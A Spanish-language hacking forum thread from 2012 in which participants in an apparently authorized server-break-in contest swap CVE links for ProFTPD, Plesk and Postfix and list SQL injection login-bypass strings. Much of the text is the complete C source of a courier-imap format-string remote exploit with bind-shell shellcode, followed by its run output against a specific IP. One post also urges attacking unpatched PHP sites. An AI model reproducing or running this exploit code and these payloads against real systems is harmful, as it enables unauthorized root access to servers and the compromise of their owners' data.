Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.
Atacar webs con Joomla o WP y ciertos módulos.
hola
pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto
dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit
tambien al rato posteo ese exploit, salu2
Cita de: dimitrix en 3 Mayo 2012, 02:25 AM
Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.
Atacar webs con Joomla o WP y ciertos módulos.
ok, no me fijara en el mensaje. :D
Vale, saco estos datos:
Ubuntu 10.04 LTS + Plesk 10.2Creo que se puede atacar con esto:
php -d safe_mode=0 plesk_remote_vulnerability_checker.php
Cita de: Belial & Grimoire en 3 Mayo 2012, 02:49 AM
hola
pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto
dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit
tambien al rato posteo ese exploit, salu2
Parece que no está modificado.
que mala suerte, bueno pues mañana lo intentare de nuevo, tampoco pude con ProFTPD, metasploit no pudo
estos son los exploits con los que intente
http://securityvulns.ru/files/sm00ny-courier_imap_fsx.c
http://old.honeynet.org/papers/enemy/imapd_exploit.txt
salu2
dimitrix porfavor mandame la ip del servidor por mp
al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar
salu2
Hola a tod@s!
Estoy de baja en casa y, sinceramente, hace mucho que no trasteo. Mis noches interminables detrás de una consola quedan muy atrás y me gustaría recordar y evolucionar un poco. ¿Cómo puedo participar? ¿A quien le pido la IP del servidor?
Gracias!
Cita de: jnet en 3 Mayo 2012, 08:14 AM
Hola a tod@s!
Estoy de baja en casa y, sinceramente, hace mucho que no trasteo. Mis noches interminables detrás de una consola quedan muy atrás y me gustaría recordar y evolucionar un poco. ¿Cómo puedo participar? ¿A quien le pido la IP del servidor?
Gracias!
Ya, ya la he pedido, me faltaba leer un poco más.
Nos tenemos k esconder nuestra direccion ip?
Gracias
Salu2
Cita de: brujo29 en 3 Mayo 2012, 14:43 PM
Nos tenemos k esconder nuestra direccion ip?
Gracias
Salu2
Evidentemente es indiferente ya que es una cosa organizada y legal.
Bueno, a lo que iba.
CVE-2011-4130, es vulnerable hasta la 1.3.3g diria
Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.
Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.
Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.
Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.
Bueno ya os comento si avanzo.
Saludos.
Cita de: m0rf en 3 Mayo 2012, 19:46 PM
Evidentemente es indiferente ya que es una cosa organizada y legal.
Bueno, a lo que iba.
CVE-2011-4130, es vulnerable hasta la 1.3.3g diria
Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.
Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.
Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.
Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.
Bueno ya os comento si avanzo.
Saludos.
Saludos morf en la pagina anterior de este mismo post hay un mensaje mio diciendo lo mismo pero no he tenido tiempo para probarla, http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)
En ese enlace tienes los 2 scripts para probar la vulnerabilidad, son para modo local y necesitas una cuenta y un archivo que descargar tenlo en cuenta. Pruebalo y nos comentas. Un saludo!
Se me olvidaba, el comando falso "WXYZ 0wn3d" debe ir así "WXYZ *0wn3d/"
Si quereis un analisis completo de esta vulnerabilidad aqui teneis: http://blog.buguroo.com/?p=3951 (http://blog.buguroo.com/?p=3951)
En efecto... Esta web http://blog.buguroo.com/?p=3951 ya la habia visto.... pero en nuestro caso no nos funcionaria por que no tenemos cuenta para identificarnos como usuario en proftpd... Por lo tanto no podemos usar esa vulnerabilidad....
Había otra tambien pero necesita tener cargado el mod_sql.... que tampoco viene de serie....
Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
Fuck no leí lo de authenticated T.T'
Gracias Xenomorfo77 por evitarme perder como media hora de mi vida xD
Seria muy interesante saber explotar esta vulnerabilidad ya que aunque no nos sirva para este caso, hay muchisimos hosts con una version inferior, que seria vulnerable, lo malo es que si lo descubrimos y posteamos aqui puede haber algun usuario malintencionado que se dedique a reventar todo lo que pille :S .Si no conseguimos nada pues se podria crear un usuario y probarla ya que dimitrix tiene acceso. Un saludo.
Hola!
Nuevo escribiendo en el foro, aunque lo sigo desde hace tiempo. La verdad es que me gustaría poder jugar un poco con esto :D
¿Alguien me puede dar la ip?
Thanks ;)!
Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o
Cita de: juan196518 en 4 Mayo 2012, 01:42 AM
Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o
Lógico, para eso sirve un escaner de vulnerabilidades. Te recomiendo que te mires otro escaner, ya que ese es un poco para novatos y no me convence demasiado. Yo utilizo nessus integrado en metaexploit framework con backtrack 5. Es fácil de instalar y usar te recomiendo que le eches un vistazo. Si no también tienes OpenVas, NeXpose y un largo etcétera. Saludos.
Gracias Xenomorfo77 tambien tengo NeXpose pero me parecio mejor el SSS despues pruebo y comento.
::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)
Por el proftp no se puede acceder porque no hay una cuenta creada :-\
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?
Cita de: dimitrix en 4 Mayo 2012, 11:51 AM
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?
Probar a ver si tiene esta vulnerabilidad: http://blog.buguroo.com/?p=3951
Cita de: dimitrix en 4 Mayo 2012, 11:51 AM
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?
Sabemos que es una vulnerabilidad y como se prueba. Pero a la hora de obtener resultados que nos valgan para algo ni idea. He contactado con el creador del articulo este del blog y estoy esperando respuesta para ver si escribe el articulo 2 explicando como explotar esta vulnerabilidad. En cuanto sepa algo os comento. Un saludo.
Cita de: dimitrix en 4 Mayo 2012, 11:51 AM
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?
http://pastebin.com/Uuk9LwjN
http://pastebin.com/iJAFCd8e
Si he entendido bien estos dos scripts son para generar la excepción, pero no carga la shell ni nada.
Cita de: dimitrix en 4 Mayo 2012, 11:51 AM
Si os creara una cuenta de proFTP ¿Qué conseguiríais hacer? ¿Entrar en la Shell como Root?
Depende del nivell que hay supongo.
Por si acaso voy ha hacer un curso acelerado de python, que es parecido a perl que si controlo algo más.
Ya nos diras si nos das cuenta de ftp.
Bueno yo tengo la cuenta de un usuario del plesk, si consigo entrar probare los sqli. La cosa es que necesitare un xss o sqli en el panel de entrada para conseguir el passwd sin fuerza bruta.
No he mirado si alguno de los xss persistentes que vi por encima se referían alguno al script de login. Y el script de login tampoco he comprobado si lo ha modificado el administrador del server.
A ver que se puede encontrar más.
Vale, pues seguimos sin modificar nada del servidor...
Calendario:
07/05/2012 - Publicaré una cuenta FTP
15/05/2012 - Instalaré la versión vulnerable de ProFTP
22/05/2012 - Daré la cuenta de Plesk para probar vulnerabilidades.
Además, seguramente una empresa conocida* patrocine todo esto y podamos realizar diferentes Hacks simultaneos y con diferentes versiones de SO, etc...
La cuestión sería montar una web o un foro donde ir publicando todo...
*Conocida por mi xD
Cita de: maxim_o en 4 Mayo 2012, 12:05 PM
Probar a ver si tiene esta vulnerabilidad: http://blog.buguroo.com/?p=3951
esa Vulnerabilidad solo sirve en proFTPd 1.3.3g o 1.3.3 y este server tiene 1.3.3c
:(
Cita de: juan196518 en 5 Mayo 2012, 03:35 AM
esa Vulnerabilidad solo sirve en proFTPd 1.3.3g o 1.3.3 y este server tiene 1.3.3c
:(
Intenta informarte antes de decir algo que es incierto, la vulnerabilidad se corrige en la version 1.3.3g y afecta a todas las versiones ANTERIORES. Un saludo.
Cita de: Xenomorfo77 en 5 Mayo 2012, 03:44 AM
Intenta informarte antes de decir algo que es incierto, la vulnerabilidad se corrige en la version 1.3.3g y afecta a todas las versiones ANTERIORES. Un saludo.
Para que lo sepas para otra vez el símbolo "<" significa "menor que". Mira el blog y verás como pone < 1.3.3g
El servidor no tiene esta vulnerabilidad pero por si a alguien le interesa se ha descubierto una vulnerabilidad el 3 de mayo para las versiones de PHP superiores a 5.3.12 y 5.4.2 dejo mas informacion y el exploit en este link http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html (http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html)
Todavia estan desarrollando el parche asi que hay que aprovechar ahora que se puede xD. Un saludo a todos.
Cita de: Xenomorfo77 en 5 Mayo 2012, 04:03 AM
El servidor no tiene esta vulnerabilidad pero por si a alguien le interesa se ha descubierto una vulnerabilidad el 3 de mayo para las versiones de PHP superiores a 5.3.12 y 5.4.2 dejo mas informacion y el exploit en este link http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html (http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html)
Todavia estan desarrollando el parche asi que hay que aprovechar ahora que se puede xD. Un saludo a todos.
Lo siento me he equivocado en la fecha :S era del 23 de febrero y ya existe el parche pero puede haber muchos sitios sin actualizarse :)
Cita de: Xenomorfo77 en 5 Mayo 2012, 03:44 AM
Intenta informarte antes de decir algo que es incierto Un saludo.
Muy buen concurso para aprender , me apunto! ;D
Hola, soy nuevo por aquí, me acabo de registrar y la verdad es que estoy asombrado porque mi intención es la de aprender un poco de este campo informático (hacking). No soy muy bueno, pero por ganas no será...Espero contestación de alguien, aunque sólo sea para saludar..muchas gracias peña!! saludos
Me mandas la ip por mp
Se puede usar medusa :huh:
No brute force...
http://www.rinconinformatico.net/ataque-de-fuerza-bruta-con-diccionario-usando-medusa
IP? Gracias.
IPIP :huh:
Tenéis que pedirla al creador del post.
Amí por ahora no se me ocurre nada :silbar: aver si lo intentan los que controlan más del tema y nos enseñan a los demás xD
Acabo de hacer una puntuación del personal, podeis ver los puntos en el primer mensaje.
Esto se hace por si nadie consigue acceder al servidor como Root pensarme si envío la cerveza.
Cita de: dimitrix en 6 Mayo 2012, 15:38 PM
Acabo de hacer una puntuación del personal, podeis ver los puntos en el primer mensaje.
Esto se hace por si nadie consigue acceder al servidor como Root pensarme si envío la cerveza.
La cerveza la conocías o la sacaste del otro post?
La cerveza la conocías o la sacaste del otro post?
El del otro post soy yo así que no hay diferencia, la conocía, la conozco y la he catado un par de veces xD
Cita de: dimitrix en 6 Mayo 2012, 16:22 PM
La cerveza la conocías o la sacaste del otro post?
El del otro post soy yo así que no hay diferencia, la conocía, la conozco y la he catado un par de veces xD
A ver si me explico, tu dijiste lo de el ganador se llevara 3 cervezas de la marca hacker.
Yo unos comentarios más adelante pongo la imagen porque busque si existia alguna marca de cervezas que se llamara hacker.
Lo que te preguntaba era si ya la conocias o la sacaste de la imagen, pero ya veo que la conocias.
Nada solo era por curiosidad, yo no la he probado solo puse la imagen.
Ahhh que va, que va, ya la conocía, te puedo contar la historia y todo hehehe...
Uno de mis proyectos 'personales' era junto a un amigo hacer uan web de cervezas (opiniones) e ir bebiendo una por una... xDD
Y dije que eran 3 cervezas puesto que existen tres variedades de HACKER PSCHORR (principalmente, en realizad hay 5 o 6), con mayor fermentación, con más trigo, etc...
He encontrado una vulnerabilidad para SMTP Postfix pero no se que version es la que tiene instalado el servidor y ademas no entendi muy bien como explotarla si alguien le echa un vistazo y lo entiende se agradeceria que lo explicara aca esta la info http://www.kb.cert.org/vuls/id/727230 y he visto algo por aca pero no se si funcionara
Dando los primeros Pasos... buscando gargamel...
parallels plesk panel 10.2.0 CVE-2011-4734
http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734
http://xx.xxx.xxx.xxx:8443/login_up.php3/
alguien sabe como explotar esa Vulnerabilidad?????
hola,
¿cual es la direccion del servidor?
Bufff... hola a todos jejeje... voy a mandar el privado a dimitrix para la ip, que aunque no tengo npi xD, nunca hay que infravalorarse y tal vez pueda ayudar algo, que mas bien me ayudareis vosotros jajaja....
Un saludo
pd: en 7 dias esto tiene ya mas paginas que la biblia xD menos mal que me las he leido ya xDD
Cita de: juan196518 en 7 Mayo 2012, 05:09 AM
parallels plesk panel 10.2.0 CVE-2011-4734
http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734
http://xx.xxx.xxx.xxx:8443/login_up.php3/
alguien sabe como explotar esa Vulnerabilidad?????
Consiste en qu elo hags usted mismo, no que te lo hagan los demás. :D :D :D :D
Cita de: juan196518 en 7 Mayo 2012, 05:09 AM
parallels plesk panel 10.2.0 CVE-2011-4734
http://cert.inteco.es/vulnDetail/Actualidad_fr/Actualite_Vulnerabilites/detalle_vulnerabilidad_fr/CVE-2011-4734
http://xx.xxx.xxx.xxx:8443/login_up.php3/
alguien sabe como explotar esa Vulnerabilidad?????
Probadas, Al parecer esta parcheado y no es vulnerable. ;D
No es tan sencillo acceder a este servidor, sin embargo, creo que hay más "luz" en los servicios popd e imapd dado que se trata de versiones muy antiguas... Tambien realizaré algunas pruebas contra el servicio de base de datos que esta instalado (mysql por el puerto 3306).
adastra te subo unos puntos si indicas como las probaste :-)
Yo esta mañana miré 5 minutos en la oficina por que no tenía más tiempo y no encontré dodne decía que fue vulnerable esa versión.
En realidad me ha faltado ser más especifico (y más claro) en mi mensaje :xD os comento.
Las vulnerabilidades de SQLi sobre Plesk que se han comentado afectan al Control Panel de Plesk, no afectan al mecanismo de autenticación o la parte pública del gestor, de todos modos he ejecutado las pruebas de SQLi estandar contra el formulario de autenticación (sin exito), en concreto, algunas han sido:
usuario: ' OR 1=1--
pass: '
usuario: admin
pass: pass+union+select+0+from+users
usuario: admin
pass: pass' union select '1','2','3
usuario: 1' having 1=1 --
pass: pass
De todos modos, las he realizado manualmente, en cuanto llegue a casa probaré con Sqlninja por si me arroja algo más...
Tambien haré algunas pruebas con Burp, webscarab y Mantra para intentar modificar los headers de las peticiones HTTP (a ver si suena la flauta y encuentro algo)... Sin embargo, como dije anteriormente, es posible que existan más probabilidades intentando explotar el servicio POPD o IMAPD, necesito indagar más sobre el servidor.
Ah, se me olvidaba... por si alguno habia pensado en utilizar Shodan (y para los que no sepais que es: http://www.shodanhq.com/)
Este servidor no se encuentra en los "radares" de Shodan, cuando se busca por
net:xx.xx.xx.xx
o
hostname:dns-name-servidor
Shodan dice:
Note: Your search for - net:x.x.x.x - did not match any hosts.
Note: Your search for - hostname:dns-name-servidor - did not match any hosts.
Bueno... aun quedan bastantes cosillas por probar a ver si se consigue algo... ;-) ;-)
CitarLas vulnerabilidades de SQLi sobre Plesk que se han comentado afectan al Control Panel de Plesk, no afectan al mecanismo de autenticación o la parte pública del gestor, de todos modos he ejecutado las pruebas de SQLi estandar contra el formulario de autenticación (sin exito), en concreto, algunas han sido
Esto quiere decir que para hacer uso de ella hace falta estar logueado ¿Verdad?
dimitrix, te he enviado un MP
Cita de: dimitrix en 7 Mayo 2012, 16:49 PM
Esto quiere decir que para hacer uso de ella hace falta estar logueado ¿Verdad?
Si, solamente con un usuario logueado y en algunas páginas del panel de control, como por ejemplo en la sección de file manager.
Adastra te añadí un punto :-)
Por ahora...
Realmente ha existido MUCHA participación, aunque me han llegado a pedir la IP unas 100 personas, la verdad es que la gente del foro ha estado compartiendo mucho y eso me gusta.
En cuanto a los ataques primero empezamos verificando el ProFTP y al ver que no es vulnerable la mayoría de ataques fueron hacia PLESK.
Y ahora...
- Ya diré más la IP, todos los mensajes serán borrados.
- Desde el día 7 hasta el 14 repartiré una cuenta PLESK (la misma a todos) para que practiquemos y vayamos explotando la aplicación (no cambiar la contraseña).
- EL día 14 formatearé el servidor y con otra contraseña tendreis que intentar acceder al Plesk para ello cada uno de los participantes me podrá enviar dos links que abriré en un navegador donde esté abierta mi cuenta de PLESK.
- Luego el día 20 lo volveré a formatear y probaremos con ProFTP.
Para pedir la cuenta PLESK...
- Teneis que haber participado en este POST (y tener la IP).
- Puedo no aceptar a alguien si creo que no va a participar 'bien'.
Una pregunta como se consigen puntos?
YO pensaba que no havian puntos sino un ganador ya ya esta.
Bueno gracias por todo.
PD:Este fin de semana me pondre con este reto haber k logro.
Cita de: Stakewinner00 en 7 Mayo 2012, 17:50 PM
Una pregunta como se consigen puntos?
YO pensaba que no havian puntos sino un ganador ya ya esta.
Bueno gracias por todo.
PD:Este fin de semana me pondre con este reto haber k logro.
Se consiguen puntos ayudando a la gente, participando y buscando y compartiendo...
Mandame la ip por mp y me apunto
Bueno, me parece que he encontrado un exploit para probar. Ahora no tengo tiempo para probarlo, por la noche le cambiare el shellcode y lo probaré.
Parece que es para las versiones que hay instaladas en el servidor.
La verdad no lo iba a publicar y probarlo para ver si comprometia el servidor. Pero como no tengo tiempo y más que nada es para aprender lo comparto.
/*
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit
Author: ktha at hush dot com
Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2
Special thanks goes to andrewg for providing the FreeBSD box.
Greetings: all the guys from irc.pulltheplug.com and irc.netric.org
bash-2.05b$ ./sm00ny-courier_imap_fsx
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
[*] Launching attack against 127.0.0.1:143
[+] Got current ebp(5100): 0xbfbfb050
[+] Got possible saved ebp(3281): 0xbfbfe390
[+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
[+] Verifying...failed
[+] Got possible saved ebp(3286): 0xbfbfe3a4
[+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
[+] Verifying...failed
[+] Got possible saved ebp(3287): 0xbfbfe3a8
[+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
[+] Verifying...OK
[+] Building fmt...done
[+] Building shellcode...done
[*] Using ret: 0x8057000
[*] Using got of fprintf(): 0x804fefc
[*] Checking for shell..
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
N.B. 1. ret can be guessed ;)
2. got, well.. that's a different story, it must be bruteforced
3. "ce_number" & "se_number" can be set with some default values when running multiple times
4. shell is usable for aprox 1 min
[ Need a challenge ? ]
[ Visit http://www.pulltheplug.com ]
*/
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#define BIGBUF 2048
#define IMAP_PORT 143
#define END_BRUTEFORCE_STACK 5500
#define TOP_STACK 0xbfc00000 /* FreeBSD */
#define START_BRUTEFORCE_SAVED_EBP 3000
#define JUNK 9
#define GAP_EBP_ESP 48
#define DUMMY_NUMBER 100
void die(int type, char *message) {
if(type == 2)
perror(message);
else
fprintf(stderr,"%s\n",message);
exit(1);
}
int connect_to (char *host, int port){
struct hostent *h;
struct sockaddr_in c;
int sock;
if ((host == NULL) || (*host == (char) 0))
die(1, "[-] Invalid hostname");
if ((c.sin_addr.s_addr = inet_addr (host)) == -1){
if ((h = gethostbyname (host)) == NULL)
die(1, "[-] Cannot resolve host");
memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr));
}
if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
die(2,"[-] Error creating socket:");
c.sin_family = PF_INET;
c.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1)
die(2, "[-] Cannot connect: ");
return sock;
}
void close_socket (int sock){
shutdown (sock, 2);
close (sock);
}
char *get_request(char *username, char *password){
char *request = (char *)malloc(strlen(username)+strlen(password)+20);
sprintf(request,"1 LOGIN \"%s\" \"%s\"\r\n",username, password);
return request;
}
void send_data(int sock, char *request){
int n;
n = send (sock, request, strlen (request), 0);
if (n != strlen (request)){
close_socket (sock);
die(1, "Error sending request\n");
}
}
int get_ce_number(char *host, int port){
int sock;
int loop;
char temp[BIGBUF];
int l,n;
char username[BIGBUF];
char password[BIGBUF];
char *request;
for (loop = END_BRUTEFORCE_STACK;;loop--){
sock = connect_to(host, port);
n = recv (sock, temp, sizeof (temp), 0);
sprintf(password,"sm00ny");
sprintf(username,"%%%d$p",loop);
request = get_request(username,password);
send_data(sock,request);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
close_socket (sock);
if (n > 0)
break;
}
return loop;
}
int get_se_number(int start, int end, char *host, int port){
int loop;
char username[BIGBUF];
char password[BIGBUF];
char *request;
int l,n;
char temp[BIGBUF];
int sock;
if (!start)
start = START_BRUTEFORCE_SAVED_EBP;
for (loop = start; loop < end; loop++){
sock = connect_to(host, port);
n = recv (sock, temp, sizeof (temp), 0);
sprintf(password,"sm00ny");
sprintf(username,"%%%d$n",loop);
request = get_request(username,password);
send_data(sock,request);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
close_socket (sock);
if (n > 0)
break;
}
if (loop == end)
return -1;
return loop;
}
int verify_se_number(int write, unsigned long addy, int number, char *host, int port){
char username[BIGBUF];
char password[BIGBUF];
char temp[BIGBUF];
char *request;
int n, sock;
sock = connect_to(host, port);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
sprintf(password,"sm00ny");
sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write);
request = get_request(username,password);
send_data(sock,request);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
close_socket (sock);
if (n <= 0)
return 0;
sock = connect_to(host, port);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
sprintf(password,"sm00ny");
sprintf(username,"%%%u$n%%%u$hn", number, write);
request = get_request(username,password);
send_data(sock,request);
memset(temp,0,sizeof(temp));
n = recv (sock, temp, sizeof (temp), 0);
close_socket (sock);
if (n > 0)
return 0;
return 1;
}
int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){
int i,j,sum,byte;
int *vec = (int *)malloc(11 * sizeof(int));
sum = JUNK;
for (i=0; i<2; i++){
for (j=0; j<2; j++){
vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum;
while (vec[2*(2 * i + j)] <= 12)
vec[2*(2 * i + j)] += 0x10000;
sum += vec[2*(2 * i + j)];
byte = ((got + 2 * i) >> (16*j)) & 0xffff;
vec[2*(2 * i + j) + 1] = byte - sum;
while (vec[2*(2 * i + j) + 1] <= 12)
vec[2*(2 * i + j) + 1] += 0x10000;
sum += vec[2*(2 * i + j) + 1];
got_addy += 2;
}
}
for (i=0; i<2; i++){
byte = (ret >> (16*i)) & 0xffff;
vec[8+i] = byte - sum;
while (vec[8+i] <= 12)
vec[8+i] += 0x10000;
sum += vec[8+i];
}
return vec;
}
char *get_format_string(int *vec, int se_number, int write_number, int got_number){
char *buf = (char *) malloc(BIGBUF);
char smallbuf[256];
int i;
for (i=0; i<4; i++){
sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number);
strcat(buf,smallbuf);
}
for (i=0; i<2; i++){
sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i);
strcat(buf,smallbuf);
}
return buf;
}
char *gen_shellcode (int gap){
int size;
char *p;
char shellcode[] =
/* Thanks ilja */
"\x31\xc0\x31\xc9\x31\xd2\xb0\x61"
"\x51\xb1\x06\x51\xb1\x01\x51\xb1"
"\x02\x51\x8d\x0c\x24\x51\xcd\x80"
"\xb1\x02\x31\xc9\x51\x51\x51\x80"
"\xc1\x77\x66\x51\xb5\x02\x66\x51"
"\x8d\x0c\x24\xb2\x10\x52\x51\x50"
"\x8d\x0c\x24\x51\x89\xc2\x31\xc0"
"\xb0\x68\xcd\x80\xb3\x01\x53\x52"
"\x8d\x0c\x24\x51\x31\xc0\xb0\x6a"
"\xcd\x80\x31\xc0\x50\x50\x52\x8d"
"\x0c\x24\x51\x31\xc9\xb0\x1e\xcd"
"\x80\x89\xc3\x53\x51\x31\xc0\xb0"
"\x5a\xcd\x80\x41\x53\x51\x31\xc0"
"\xb0\x5a\xcd\x80\x41\x53\x51\x31"
"\xc0\xb0\x5a\xcd\x80\x31\xdb\x53"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x31\xc0\x50\x54"
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\xb0\x01\xcd\x80";
size = strlen (shellcode);
p = (char *) malloc (gap + 1);
/* Some nops ;) */
memset (p, 0x41, gap);
memcpy (p + gap - size, shellcode, size + 1);
return p;
}
void root(char *host) {
fd_set rfds;
int n;
int sock;
char buff[1024];
sock = connect_to(host,30464);
send(sock,"id;\n",4,0);
while(1) {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
if(select(sock+1, &rfds, NULL, NULL, NULL) < 1)
exit(0);
if(FD_ISSET(0,&rfds)) {
if( (n = read(0,buff,sizeof(buff))) < 1)
exit(0);
if( send(sock,buff,n,0) != n)
exit(0);
}
if(FD_ISSET(sock,&rfds)) {
if( (n = recv(sock,buff,sizeof(buff),0)) < 1)
exit(0);
write(1,buff,n);
}
}
}
main (int argc, char **argv) {
char *host="127.0.0.1";
int port = IMAP_PORT;
int sock;
char *temp1, *temp2;
char *request;
int *vec;
int n,ok,i;
unsigned long cur_ebp; // was 5100 on my box
int ce_number = 0;
unsigned long saved_ebp; // was 3287 on my box
int se_number = 0;
unsigned long write_addy;
int write_number = 0;
unsigned long got_addy;
int got_number = 0;
/* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */
unsigned long got = 0x0804fefc;
/* heh.. it's up to you to find this one :P Just use your favourite mathod */
unsigned long ret = 0x8057000;
if (argc > 1)
host = argv[1];
printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com\n");
printf("[*] Launching attack against %s:%d\n",host,port);
if (ce_number == 0)
ce_number = get_ce_number(host,port);
cur_ebp = TOP_STACK - 4 * ce_number;
got_number = DUMMY_NUMBER;
got_addy = cur_ebp + 4 * (got_number - 1);
printf("[+] Got current ebp(%d): %p\n",ce_number,cur_ebp);
do{
se_number = get_se_number(se_number,ce_number,host,port);
if (se_number == -1)
die(1,"[-] Failed to get a saved_ebp !");
saved_ebp = cur_ebp + 4 * (se_number - 1);
printf("[+] Got possible saved ebp(%d): %p\n",se_number,saved_ebp);
write_addy = GAP_EBP_ESP + saved_ebp;
write_number = (write_addy - cur_ebp) / 4 + 1;
printf("[+] Got possible write on the stack pointer(%d): %p\n",write_number,write_addy);
printf("[+] Verifying...");
ok = verify_se_number(write_number,got_addy,se_number,host,port);
if (ok)
printf("OK\n");
else {
printf("failed\n");
se_number++;
}
}while (!ok);
printf("[+] Building fmt...");
vec = get_format_vector(got_addy,got,ret);
temp1 = get_format_string(vec,se_number,write_number,got_number);
printf("done\n");
printf("[+] Building shellcode...");
temp2 = gen_shellcode(800);
printf("done\n");
printf("[*] Using ret: %p\n",ret);
printf("[*] Using got of fprintf(): %p\n",got);
request = get_request(temp1,temp2);
sock = connect_to(host, port);
send_data(sock,request);
sleep(2);
close_socket (sock);
printf("[*] Checking for shell..\n");
root(host);
}
Se tienen que cambiar tres o cuatro cosas por lo que veo a simple vista. En el aviso de seguridad no especifica que sea solo para freebsd y puesto que es un format string, cambiando los valores de la pila que utiliza seguramente funcionará.
Nada que os divirtáis probando xD
Respecto al Plesk 10.2, no he encontrado ningun fallo que pueda ser explotado sin credenciales. Bueno tal vez uno en openssl, pero no he investigado más.
Encontré un fallo en el postfix http://www.postfix.org/CVE-2011-0411.html, pero es para ser explotado con mitm ya que es un fallo en la conexión TLS.
A ver si hay suerte.
IP , por favor.
Gracias m0rf
Era justo el mismo exploit que estaba revisando... :xD :xD :xD
Pero existe un problema... el servidor tiene una versión del kernel superior a la 2.6.7 y tiene activado el ASLR (Stack Randomization), por lo tanto no sabemos cual es el valor que asumirá la stack en cada ejecución al ser está dinámica, en consecuencia cuando se ejecuta se obtiene algo como lo siguiente
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
[*] Launching attack against 85.214.226.180:143
[+] Got current ebp(5500): 0xbfbfaa10
[+] Got possible saved ebp(3000): 0xbfbfd8ec
[+] Got possible write on the stack pointer(3012): 0xbfbfd91c
[+] Verifying...failed
[+] Got possible saved ebp(3001): 0xbfbfd8f0
[+] Got possible write on the stack pointer(3013): 0xbfbfd920
[+] Verifying...failed
[+] Got possible saved ebp(3002): 0xbfbfd8f4
